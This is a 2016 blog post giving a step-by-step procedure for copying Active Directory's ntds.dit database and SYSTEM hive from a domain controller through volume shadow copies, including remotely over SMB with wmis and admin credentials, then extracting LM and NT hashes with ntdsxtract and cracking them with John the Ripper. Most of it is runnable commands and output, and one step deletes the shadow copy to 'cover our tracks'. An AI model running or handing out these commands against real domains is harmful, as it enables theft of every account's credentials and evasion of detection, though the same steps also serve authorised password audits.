Thursday, October 20, 2016

dumping ad passwords and cracking with jtr

yes, some people use the euphemism "windows domain controller password audit." but, let's call it what it is: dumping ad and getting password hashes. i'm using jtr.
  
 ........................................  
 on a domain Controller using a privileged account:  
   
 C:\ vssadmin list shadows  
   
 none. okay.  
   
 * where's ntds.dit ? take note.  
   
 C:\Windows\NTDS\ntds.dit  
   
 * make a system dir  
   
 C:\ mkdir C:\Windows\system  
   
 * make a shadow copy of C:\  
   
 * C:\ vssadmin create shadow /for=C:  
   
 you should see:  
   
 Successly create shadow for 'C:\'  
   
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
   
 Successfully created shadow copy for 'C:\'  
   Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
   Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
   
 * C:\Users\administrator>vssadmin list shadows  
   
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
   
 Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}  
   Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM  
    Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
      Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\  
      Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
      Originating Machine: domain-dc1.domain  
      Service Machine: domain-dc1.domain  
      Provider: 'Microsoft Software Shadow Copy provider 1.0'  
      Type: ClientAccessible  
      Attributes: Persistent, Client-accessible, No auto release, No writers,  
  Differential  
   
 * next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.  
 that would be from the shadow volume NTDS location to, say, C:\  
   
 C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\NTDS\ntds.dit C:\  
     1 file(s) copied.  
       
 * copy SYSTEM hive  
   
 C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\System32\config\SYSTEM C:\  
     1 file(s) copied.  
 
 * let's cover our tracks and prevent others from grabbing dit and SYSTEM
 C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250 

 ........................................  
 a linux interlude... if you have admin creds
 and do not have access to a console and do
 not want to have access to a console
 
 # mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt 
 # apt-get intall wmis
 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
 vssadmin list shadows > c:\output.txt"
 # cat /root/mnt/output.txt
 
 look for ShadowsCopy that is where you'll find ntds.dit and SYSTEM

 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
 
 # wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"

 # ls /mnt
 ntds.dit SYSTEM 
      
 ........................................  
 linux ubuntu/debian rig
  
 install base packages:
  
 # apt-get install cifs-utils autoconf automake autopoint libtool pkg-config  
   
 offline processing tools:  
   
 libesedb  
   
 # git clone https://github.com/libyal/libesedb.git  
 # cd libesedb/  
 # ./synclibs.sh  
 # ./autogen.sh  
 # ./configure  
 # make && make install  
 # ldconfig <- load library  
   
 credump  
   
 # git clone https://github.com/moyix/creddump.git  
   
 ntdsextract  
   
 # get clone https://github.com/csababarta/ntdsxtract.git  
   
 get cracking!  
   
 # mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt  
 # mkdir domain 
 # cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/  
 # cd ~/libesedb/esedbtools  
 # ./esedbexport -t ~/ntds ~/ntds.dit  
   
 # ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit  
 esedbexport 20160924  
   
 Opening file.  
 Exporting table 1 (MSysObjects) out of 12.  
 Exporting table 2 (MSysObjectsShadow) out of 12.  
 Exporting table 3 (MSysUnicodeFixupVer2) out of 12.  
 Exporting table 4 (datatable) out of 12.  
 Exporting table 5 (hiddentable) out of 12.  
 Exporting table 6 (link_table) out of 12.  
 Exporting table 7 (sdpropcounttable) out of 12.  
 Exporting table 8 (sdproptable) out of 12.  
 Exporting table 9 (sd_table) out of 12.  
 Exporting table 10 (MSysDefrag2) out of 12.  
 Exporting table 11 (quota_table) out of 12.  
 Exporting table 12 (quota_rebuild_progress_table) out of 12.  
 Export completed.  
   
 # ls ~/domain.export  
   
 datatable.3      <- accounts
 hiddentable.4  
 link_table.5     <- db links
 MSysDefrag2.9  
 MSysObjects.0  
 MSysObjectsShadow.1  
 MSysUnicodeFixupVer2.2  
 quota_rebuild_progress_table.11  
 quota_table.10  
 sdpropcounttable.6  
 sdproptable.7  
 sd_table.8  
   
 # python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM  

 what does that mean?
 command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
   
 [+] Started at: Thu, 20 Oct 2016 17:47:21 UTC  
 [+] Started with options:  
     [-] Extracting password hashes  
     [-] LM hash output filename: /root/domain/lmhash.out  
     [-] NT hash output filename: /root/domain/nthash.out  
     [-] Hash output format: john  
 The directory (/root/temp) specified does not exists!  
 Would you like to create it? [Y/N]  
   
 # ls ~/domain/  
   
 lmhash.out  
 nthash.out  
   
 * feed into jtr and use cracked passes to compose a wordlist suitable for nt format  
   
 # ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out  
 note: lm is not compatible with gpu cracking  
   
 # ./john --show lmhast.out  
   
 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt  
   
 # ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out  
   
Post a Comment